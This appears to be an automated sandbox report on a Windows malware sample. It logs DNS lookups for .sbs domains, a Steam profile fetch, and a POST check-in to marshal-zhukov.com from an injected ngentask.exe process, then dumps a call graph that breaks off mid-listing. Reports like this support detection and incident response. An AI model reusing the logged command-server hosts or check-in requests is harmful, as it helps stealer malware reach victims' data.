                                                                                                                    Nov 21, 2024 13:45:22.744905949 CET1.1.1.1192.168.2.90x8738Name error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.016148090 CET1.1.1.1192.168.2.90x83d6Name error (3)enlargkiw.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.274560928 CET1.1.1.1192.168.2.90x60fdName error (3)resinedyw.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.535934925 CET1.1.1.1192.168.2.90x202bName error (3)vennurviot.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:23.783781052 CET1.1.1.1192.168.2.90xf2d2Name error (3)ehticsprocw.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:24.032608032 CET1.1.1.1192.168.2.90x824aName error (3)condifendteu.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:24.278294086 CET1.1.1.1192.168.2.90xbafcName error (3)drawwyobstacw.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:24.508641005 CET1.1.1.1192.168.2.90xd211No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:27.349638939 CET1.1.1.1192.168.2.90x99e4No error (0)marshal-zhukov.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 13:45:27.349638939 CET1.1.1.1192.168.2.90x99e4No error (0)marshal-zhukov.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    • steamcommunity.com
                                                                                                                    • marshal-zhukov.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.949765104.102.49.2544432976C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-21 12:45:26 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Host: steamcommunity.com
                                                                                                                    2024-11-21 12:45:26 UTC1905INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Date: Thu, 21 Nov 2024 12:45:26 GMT
                                                                                                                    Content-Length: 35604
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: sessionid=38400b1f7eb6985721b07fb4; Path=/; Secure; SameSite=None
                                                                                                                    Set-Cookie: steamCountry=US%7C820d04e8bfee2ac1774d9f20f79a4923; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                    2024-11-21 12:45:26 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                    2024-11-21 12:45:27 UTC16384INData Raw: 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0d 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0d 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73
                                                                                                                    Data Ascii: Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts
                                                                                                                    2024-11-21 12:45:27 UTC3768INData Raw: 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 37 32 34 33 33 31 39 30 30 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65
                                                                                                                    Data Ascii: <a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199724331900/badges"><div class="persona_name persona_level">Le
                                                                                                                    2024-11-21 12:45:27 UTC973INData Raw: 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0d
                                                                                                                    Data Ascii: unity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.949776188.114.97.34432976C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-21 12:45:28 UTC265OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: marshal-zhukov.com
                                                                                                                    2024-11-21 12:45:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-11-21 12:45:29 UTC996INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 21 Nov 2024 12:45:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=4tog8l1sa2o4p5umdlb4j6jduo; expires=Mon, 17-Mar-2025 06:32:08 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FNXsAT213ebUZ6c%2Bkonky1fjRZwSz7%2FwnN30erQV8I4O1%2BRWZSiPBgLXhemZr%2BehZGXrRTgA%2Fhf2yYAW0d2cjaABZgMdcgtX7CVRD0tLQiKe4N4zTDdwwFmIbjFgAgWRzy%2BISc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e60c6ef9fd4440d-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1855146&cwnd=191&unsent_bytes=0&cid=b00b79f4cf7c4bd4&ts=725&x=0"
                                                                                                                    2024-11-21 12:45:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                    Data Ascii: 2ok
                                                                                                                    2024-11-21 12:45:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:07:45:17
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\ceFgl3jkkk.exe"
                                                                                                                    Imagebase:0xf50000
                                                                                                                    File size:7'166'290 bytes
                                                                                                                    MD5 hash:9CF2FCABD10EE683A3652815014B368C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:07:45:18
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\ceFgl3jkkk.exe"
                                                                                                                    Imagebase:0xf50000
                                                                                                                    File size:7'166'290 bytes
                                                                                                                    MD5 hash:9CF2FCABD10EE683A3652815014B368C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:07:45:20
                                                                                                                    Start date:21/11/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
                                                                                                                    Imagebase:0xc40000
                                                                                                                    File size:79'816 bytes
                                                                                                                    MD5 hash:AE933850C93D3B3001AB21BB65C3EFA1
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:9.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:8.8%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:127
                                                                                                                      execution_graph 16636 f68975 16637 f68985 16636->16637 16640 f68998 ___from_strstr_to_strchr 16636->16640 16638 f5e619 _free 14 API calls 16637->16638 16639 f6898a 16638->16639 16641 f68b8c 16640->16641 16732 f68f74 16640->16732 16642 f5e619 _free 14 API calls 16641->16642 16643 f689f4 16642->16643 16647 f63b77 _free 14 API calls 16643->16647 16646 f689ef 16646->16643 16736 f67024 16646->16736 16647->16639 16648 f689db 16648->16641 16653 f689e8 16648->16653 16656 f68f74 37 API calls 16653->16656 16654 f68a75 16657 f63b77 _free 14 API calls 16654->16657 16655 f63b77 _free 14 API calls 16658 f68a0f 16655->16658 16670 f689ed 16656->16670 16661 f68a7d 16657->16661 16658->16643 16662 f67024 __dosmaperr 14 API calls 16658->16662 16658->16670 16659 f68ac0 16659->16643 16660 f6ac96 28 API calls 16659->16660 16663 f68aee 16660->16663 16668 f68aaa 16661->16668 16747 f6ac96 16661->16747 16664 f68a2f 16662->16664 16665 f63b77 _free 14 API calls 16663->16665 16667 f63b77 _free 14 API calls 16664->16667 16665->16668 16667->16670 16668->16643 16672 f67024 __dosmaperr 14 API calls 16668->16672 16669 f68aa1 16671 f63b77 _free 14 API calls 16669->16671 16670->16643 16743 f68fa8 16670->16743 16671->16668 16673 f68b35 16672->16673 16674 f68b7a 16673->16674 16756 f62fa8 16673->16756 16675 f63b77 _free 14 API calls 16674->16675 16675->16643 16678 f68b50 16765 f6ebe5 16678->16765 16679 f68ba8 16780 f63b43 IsProcessorFeaturePresent 16679->16780 16683 f68bb2 16684 f68bc3 16683->16684 16689 f68bd6 _wcschr 16683->16689 16685 f5e619 _free 14 API calls 16684->16685 16687 f68bc8 16685->16687 16688 f68ddf 16690 f5e619 _free 14 API calls 16688->16690 16689->16688 16784 f68f8e 16689->16784 16733 f68f81 16732->16733 16734 f689c4 16732->16734 16801 f68e06 16733->16801 16734->16646 16734->16648 16734->16670 16741 f67031 __dosmaperr 16736->16741 16737 f6705c RtlAllocateHeap 16739 f6706f 16737->16739 16737->16741 16738 f67071 16740 f5e619 _free 13 API calls 16738->16740 16739->16655 16740->16739 16741->16737 16741->16738 17044 f6adc6 16741->17044 16744 f68a65 16743->16744 16746 f68fbe 16743->16746 16744->16654 16744->16659 16746->16744 17058 f6eaf4 16746->17058 16748 f6aca3 16747->16748 16749 f6acbe 16747->16749 16748->16749 16750 f6acaf 16748->16750 16751 f6accd 16749->16751 17217 f6f452 16749->17217 16752 f5e619 _free 14 API calls 16750->16752 17224 f6f485 16751->17224 16755 f6acb4 __fread_nolock 16752->16755 16755->16669 16757 f62fc3 16756->16757 16758 f62fb5 16756->16758 16759 f5e619 _free 14 API calls 16757->16759 16758->16757 16763 f62fda 16758->16763 16760 f62fcb 16759->16760 16761 f63b33 __fread_nolock 25 API calls 16760->16761 16762 f62fd5 16761->16762 16762->16678 16762->16679 16763->16762 16764 f5e619 _free 14 API calls 16763->16764 16764->16760 17236 f5eb8a 16765->17236 16781 f63b4f 16780->16781 16782 f63987 _mbstowcs 8 API calls 16781->16782 16783 f63b64 GetCurrentProcess TerminateProcess 16782->16783 16783->16683 16785 f68c08 16784->16785 16786 f68f9b 16784->16786 16802 f68e14 16801->16802 16803 f68e19 16801->16803 16802->16734 16804 f67024 __dosmaperr 14 API calls 16803->16804 16812 f68e36 16804->16812 16805 f68ea4 16816 f63002 16805->16816 16807 f63b77 _free 14 API calls 16807->16802 16808 f68ea9 16809 f63b43 __wsopen_s 11 API calls 16808->16809 16810 f68eb5 16809->16810 16811 f67024 __dosmaperr 14 API calls 16811->16812 16812->16805 16812->16808 16812->16811 16813 f63b77 _free 14 API calls 16812->16813 16814 f62fa8 25 API calls 16812->16814 16815 f68e93 16812->16815 16813->16812 16814->16812 16815->16807 16827 f60cda 16816->16827 16820 f6303b 16824 f62867 _mbstowcs 23 API calls 16820->16824 16821 f6301c IsProcessorFeaturePresent 16823 f63028 16821->16823 16822 f63012 16822->16820 16822->16821 16857 f63987 16823->16857 16826 f63045 16824->16826 16863 f60b12 16827->16863 16830 f60d1f 16831 f60d2b ___scrt_is_nonwritable_in_current_image 16830->16831 16832 f663ab __dosmaperr 14 API calls 16831->16832 16833 f60d52 _mbstowcs 16831->16833 16837 f60d58 _mbstowcs 16831->16837 16832->16833 16834 f60d9f 16833->16834 16833->16837 16840 f60d89 16833->16840 16835 f5e619 _free 14 API calls 16834->16835 16836 f60da4 16835->16836 16874 f63b33 16836->16874 16839 f60dcb 16837->16839 16877 f68793 EnterCriticalSection 16837->16877 16843 f60efe 16839->16843 16846 f60e0d 16839->16846 16854 f60e3c 16839->16854 16840->16822 16844 f60f09 16843->16844 16909 f687db LeaveCriticalSection 16843->16909 16848 f62867 _mbstowcs 23 API calls 16844->16848 16846->16854 16878 f66254 GetLastError 16846->16878 16850 f60f11 16848->16850 16851 f66254 _mbstowcs 37 API calls 16855 f60e91 16851->16855 16905 f60eab 16854->16905 16855->16840 16858 f639a3 _mbstowcs __fread_nolock 16857->16858 16859 f639cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16858->16859 16860 f63aa0 _mbstowcs 16859->16860 17036 f596fa 16860->17036 16864 f60b1e ___scrt_is_nonwritable_in_current_image 16863->16864 16869 f68793 EnterCriticalSection 16864->16869 16866 f60b2c 16870 f60b6a 16866->16870 16869->16866 16873 f687db LeaveCriticalSection 16870->16873 16872 f60b53 16872->16822 16872->16830 16873->16872 16910 f63acf 16874->16910 16877->16839 16879 f6626b 16878->16879 16882 f66271 16878->16882 16918 f6736d 16879->16918 16902 f66277 SetLastError 16882->16902 16923 f673ac 16882->16923 16906 f60eb1 16905->16906 16907 f60e82 16905->16907 17035 f687db LeaveCriticalSection 16906->17035 16907->16840 16907->16851 16907->16855 16909->16844 17035->16907 17047 f6adf3 17044->17047 17048 f6adff ___scrt_is_nonwritable_in_current_image 17047->17048 17053 f68793 EnterCriticalSection 17048->17053 17050 f6ae0a 17054 f6ae46 17050->17054 17053->17050 17057 f687db LeaveCriticalSection 17054->17057 17056 f6add1 17056->16741 17057->17056 17059 f6eb02 17058->17059 17062 f6eb1d 17059->17062 17082 f5c80e 17062->17082 17065 f6eb4f 17067 f5e619 _free 14 API calls 17065->17067 17066 f6eb66 17068 f6eb81 17066->17068 17069 f6eb6f 17066->17069 17070 f6eb54 17067->17070 17073 f6eba1 17068->17073 17074 f6eb8e 17068->17074 17072 f5e619 _free 14 API calls 17069->17072 17071 f63b33 __fread_nolock 25 API calls 17070->17071 17075 f6eb18 17071->17075 17076 f6eb74 17072->17076 17108 f704de 17073->17108 17090 f6de40 17074->17090 17075->16746 17079 f63b33 __fread_nolock 25 API calls 17076->17079 17079->17075 17081 f5e619 _free 14 API calls 17081->17075 17083 f5c82e 17082->17083 17089 f5c825 17082->17089 17084 f66254 _mbstowcs 37 API calls 17083->17084 17083->17089 17085 f5c84e 17084->17085 17113 f664a6 17085->17113 17089->17065 17089->17066 17089->17075 17091 f6de50 17090->17091 17092 f6de6a 17090->17092 17095 f5e619 _free 14 API calls 17091->17095 17093 f6de72 17092->17093 17094 f6de89 17092->17094 17097 f5e619 _free 14 API calls 17093->17097 17098 f6de95 17094->17098 17099 f6deac 17094->17099 17096 f6de55 17095->17096 17100 f63b33 __fread_nolock 25 API calls 17096->17100 17101 f6de77 17097->17101 17102 f5e619 _free 14 API calls 17098->17102 17103 f5c80e _mbstowcs 37 API calls 17099->17103 17106 f6de60 17099->17106 17100->17106 17104 f63b33 __fread_nolock 25 API calls 17101->17104 17105 f6de9a 17102->17105 17103->17106 17104->17106 17107 f63b33 __fread_nolock 25 API calls 17105->17107 17106->17075 17107->17106 17109 f5c80e _mbstowcs 37 API calls 17108->17109 17110 f704f1 17109->17110 17164 f70253 17110->17164 17114 f5c864 17113->17114 17115 f664b9 17113->17115 17117 f664d3 17114->17117 17115->17114 17121 f6abc5 17115->17121 17118 f664e6 17117->17118 17119 f664fb 17117->17119 17118->17119 17143 f6a1ef 17118->17143 17119->17089 17122 f6abd1 ___scrt_is_nonwritable_in_current_image 17121->17122 17123 f66254 _mbstowcs 37 API calls 17122->17123 17124 f6abda 17123->17124 17131 f6ac20 17124->17131 17134 f68793 EnterCriticalSection 17124->17134 17126 f6abf8 17135 f6ac46 17126->17135 17131->17114 17134->17126 17136 f6ac54 __dosmaperr 17135->17136 17138 f6ac09 17135->17138 17137 f6a979 __dosmaperr 14 API calls 17136->17137 17136->17138 17137->17138 17139 f6ac25 17138->17139 17142 f687db LeaveCriticalSection 17139->17142 17144 f66254 _mbstowcs 37 API calls 17143->17144 17145 f6a1f9 17144->17145 17148 f6a107 17145->17148 17149 f6a113 ___scrt_is_nonwritable_in_current_image 17148->17149 17155 f6a12d 17149->17155 17159 f68793 EnterCriticalSection 17149->17159 17151 f6a13d 17157 f63b77 _free 14 API calls 17151->17157 17158 f6a169 17151->17158 17152 f6a134 17152->17119 17154 f63002 _mbstowcs 37 API calls 17156 f6a1a6 17154->17156 17155->17152 17155->17154 17157->17158 17159->17151 17166 f70287 17164->17166 17165 f596fa _ValidateLocalCookies 5 API calls 17167 f6ebb7 17165->17167 17168 f70304 17166->17168 17170 f702f1 GetCPInfo 17166->17170 17175 f70308 17166->17175 17167->17075 17167->17081 17168->17175 17188 f67937 17168->17188 17170->17168 17170->17175 17171 f70389 17171->17175 17176 f703ac 17171->17176 17191 f65ba2 17171->17191 17172 f704b2 17174 f67937 _mbstowcs MultiByteToWideChar 17175->17165 17176->17172 17176->17174 17189 f67948 MultiByteToWideChar 17188->17189 17189->17171 17192 f65be0 17191->17192 17196 f65bb0 __dosmaperr 17191->17196 17196->17192 17218 f6f472 HeapSize 17217->17218 17219 f6f45d 17217->17219 17218->16751 17220 f5e619 _free 14 API calls 17219->17220 17221 f6f462 17220->17221 17222 f63b33 __fread_nolock 25 API calls 17221->17222 17223 f6f46d 17222->17223 17223->16751 17225 f6f492 17224->17225 17226 f6f49d 17224->17226 17227 f65ba2 __fread_nolock 15 API calls 17225->17227 17228 f6f4a5 17226->17228 17234 f6f4ae __dosmaperr 17226->17234 17233 f6f49a 17227->17233 17231 f63b77 _free 14 API calls 17228->17231 17229 f6f4b3 17232 f5e619 _free 14 API calls 17229->17232 17230 f6f4d8 HeapReAlloc 17230->17233 17230->17234 17231->17233 17232->17233 17233->16755 17234->17229 17234->17230 17235 f6adc6 __dosmaperr 2 API calls 17234->17235 17235->17234 17237 f5c80e _mbstowcs 37 API calls 17236->17237 17238 f5eb9c 17237->17238 17239 f5ebae 17238->17239 17244 f67273 17238->17244 17241 f5e75e 17239->17241 17250 f5e6ac 17241->17250 17247 f67081 17244->17247 17248 f671b0 __dosmaperr 5 API calls 17247->17248 17249 f67097 17248->17249 17249->17239 17251 f5e6d4 17250->17251 17252 f5e6ba 17250->17252 17590 f5e77b 17591 f5e797 17590->17591 17592 f5e789 17590->17592 17594 f5eb8a 37 API calls 17591->17594 17603 f5e7ed 17592->17603 17595 f5e7b1 17594->17595 17597 f5e75e 17 API calls 17595->17597 17596 f5e793 17598 f5e7be 17597->17598 17599 f5e7c5 17598->17599 17600 f5e7ed 56 API calls 17598->17600 17601 f5e7e7 17599->17601 17602 f63b77 _free 14 API calls 17599->17602 17600->17599 17602->17601 17604 f5e818 __fread_nolock 17603->17604 17605 f5e7fb 17603->17605 17608 f5e83e 17604->17608 17609 f5e85a CreateFileW 17604->17609 17606 f5e606 __dosmaperr 14 API calls 17605->17606 17607 f5e800 17606->17607 17610 f5e619 _free 14 API calls 17607->17610 17611 f5e606 __dosmaperr 14 API calls 17608->17611 17612 f5e88c 17609->17612 17613 f5e87e 17609->17613 17614 f5e808 17610->17614 17615 f5e843 17611->17615 17652 f5e8cb 17612->17652 17626 f5e955 GetFileType 17613->17626 17617 f63b33 __fread_nolock 25 API calls 17614->17617 17619 f5e619 _free 14 API calls 17615->17619 17620 f5e813 17617->17620 17621 f5e84a 17619->17621 17620->17596 17622 f63b33 __fread_nolock 25 API calls 17621->17622 17624 f5e855 17622->17624 17623 f5e887 __fread_nolock 17623->17624 17625 f5e8bd CloseHandle 17623->17625 17624->17596 17625->17624 17627 f5e990 17626->17627 17628 f5ea42 17626->17628 17631 f5e9aa __fread_nolock 17627->17631 17663 f5ed82 17627->17663 17629 f5ea6e 17628->17629 17630 f5ea4c 17628->17630 17632 f5ea98 PeekNamedPipe 17629->17632 17637 f5ea39 17629->17637 17634 f5ea50 17630->17634 17635 f5ea5f GetLastError 17630->17635 17636 f5e9c9 GetFileInformationByHandle 17631->17636 17631->17637 17632->17637 17638 f5e619 _free 14 API calls 17634->17638 17640 f5e5e3 __dosmaperr 14 API calls 17635->17640 17636->17635 17639 f5e9df 17636->17639 17641 f596fa _ValidateLocalCookies 5 API calls 17637->17641 17638->17637 17670 f5ecd4 17639->17670 17640->17637 17643 f5eac3 17641->17643 17643->17623 17647 f5eac5 7 API calls 17648 f5ea0f 17647->17648 17649 f5eac5 7 API calls 17648->17649 17650 f5ea26 17649->17650 17687 f5eca1 17650->17687 17733 f5ef1f 17652->17733 17655 f5e8de 17657 f5e5e3 __dosmaperr 14 API calls 17655->17657 17656 f5e8ea 17658 f5ecd4 38 API calls 17656->17658 17659 f5e8e5 17657->17659 17660 f5e8f7 17658->17660 17659->17623 17661 f5ed82 21 API calls 17660->17661 17662 f5e916 17661->17662 17662->17623 17664 f5ed9b 17663->17664 17665 f5edd1 17664->17665 17666 f5edaf 17664->17666 17692 f676c8 17665->17692 17668 f5e5e3 __dosmaperr 14 API calls 17666->17668 17669 f5edbc 17666->17669 17668->17669 17669->17631 17672 f5ecea 17670->17672 17671 f5e9eb 17680 f5eac5 17671->17680 17672->17671 17708 f67836 17672->17708 17674 f5ed2e 17674->17671 17675 f67836 38 API calls 17674->17675 17676 f5ed3f 17675->17676 17676->17671 17677 f67836 38 API calls 17676->17677 17678 f5ed50 17677->17678 17678->17671 17681 f5eadd 17680->17681 17682 f5eaeb FileTimeToSystemTime 17680->17682 17681->17682 17684 f5eae3 17681->17684 17683 f5eafd SystemTimeToTzSpecificLocalTime 17682->17683 17682->17684 17683->17684 17685 f596fa _ValidateLocalCookies 5 API calls 17684->17685 17686 f5e9fc 17685->17686 17686->17647 17688 f5ecb5 17687->17688 17706 f5a8f0 17692->17706 17695 f6770e 17702 f596fa _ValidateLocalCookies 5 API calls 17695->17702 17696 f6771d 17697 f67024 __dosmaperr 14 API calls 17696->17697 17698 f6772a 17697->17698 17699 f67732 GetCurrentDirectoryW 17698->17699 17700 f6773e 17698->17700 17699->17700 17703 f67743 17699->17703 17701 f5e619 _free 14 API calls 17700->17701 17701->17703 17704 f6776a 17702->17704 17705 f63b77 _free 14 API calls 17703->17705 17704->17669 17705->17695 17707 f5a907 GetCurrentDirectoryW 17706->17707 17707->17695 17707->17696 17709 f67844 17708->17709 17710 f67867 17708->17710 17709->17710 17711 f6784a 17709->17711 17718 f6787f 17710->17718 17714 